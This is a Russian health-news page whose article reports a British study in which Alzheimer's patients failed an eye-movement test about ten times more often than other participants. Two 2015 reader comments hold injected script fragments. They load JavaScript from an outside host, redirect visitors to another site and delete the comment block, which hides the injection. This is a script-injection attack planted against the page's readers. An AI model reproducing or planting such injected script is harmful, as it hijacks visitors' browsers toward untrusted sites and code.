Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ваши глаза скажут, будет ...  >>  Ваши глаза скажут, будет ли у вас старческое слабоумие
 
Обратная связь
 

Ваши глаза скажут, будет ли у вас старческое слабоумие

Размер шрифта
16 октября 2012 17:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Британские ученые обнаружили, что специальное исследование глаз позволит выявлять болезнь Альцгеймера на ранних стадиях.

болезнь Альцгеймера

Что такое болезнь Альцгеймера

Болезнь Альцгеймера – это неврологическое заболевание, одна из самых распространенных форм слабоумия. Как правило, заболевание развивается у людей старше 65 лет. Основной причиной заболевания считается белок бета-амилоид, который откладывается в головном мозге в виде бляшек. Предшественник этого белка находится в наружной мембране нервных клеток. Если предшественник не разрушается, то он превращается в бета-амилоид, который вызывает гибель клеток головного мозга.  Болезнь Альцгеймера характеризуется прогрессирующим снижением памяти, ухудшением речи, нарушением координации движений и, в конечном счете, приводит к тому, что пациент не может обойтись без посторонней помощи.

История вопроса

В настоящее время диагностика болезни Альцгеймера основана на результатах серии нейропсихологических тестов. Однако многим пациентам трудно выполнить эти тесты в связи с ухудшением концентрации внимания и памяти. В течение последних 10 лет ученые пытались разработать новый метод диагностики, основанный на движениях глаз, которые позволяют оценить такие функции головного мозга, как концентрация внимания, мышление и память.

Суть исследования

В исследовании приняли участие 18 пациентов с болезнью Альцгеймера, 25 пациентов с болезнью Паркинсона, 17 здоровых молодых людей и 18 здоровых пожилых людей. Участники исследования должны были следить за движением луча света на мониторе компьютера. Время от времени их просили отвлечься от луча света и посмотреть в противоположную сторону.

Оказалось, что в большинстве случаев пациенты с болезнью Альцгеймера не могли смотреть в противоположную сторону от луча, хотя абсолютно точно выполняли команды, когда их просили следить за светом. Подобные «ошибки» наблюдались у пациентов с болезнью Альцгеймера в 10 раз чаще, чем у других участников исследования.

Результаты

Полученные результаты свидетельствуют о том, что пациенты с болезнью Альцгеймера не замечают и не корректируют «ошибки», которые возникают, когда их просят посмотреть в противоположную сторону от луча света. Эти «ошибки» связаны с изменениями, которые происходят в головном мозге при болезни Альцгеймера.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Люди с повышенным внутриглазным давлением чаще разбиваются на машинах   Пять способов борьбы с сухостью глаз   Диагноз «шизофрения» можно поставить по движению глаз   Глаза расскажут о состоянии головного мозга  
15 октября 2012Ваши глаза скажут, будет ли у вас старческое слабоумие 13 марта 2013Куда надо смотреть, чтобы понять, что думает человек
 
18 февраля 2013Люди с повышенным внутриглазным давлением чаще разбиваются на машинах 01 февраля 2013Диагноз «шизофрения» можно поставить по движению глаз
 

Слайдшоу

1
Что с моими глазами?! Как видят больные глаза
Мифы и факты о глазах
Как сохранить глаза

Тесты

Проверьте свое зрение
Возраст мозга
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.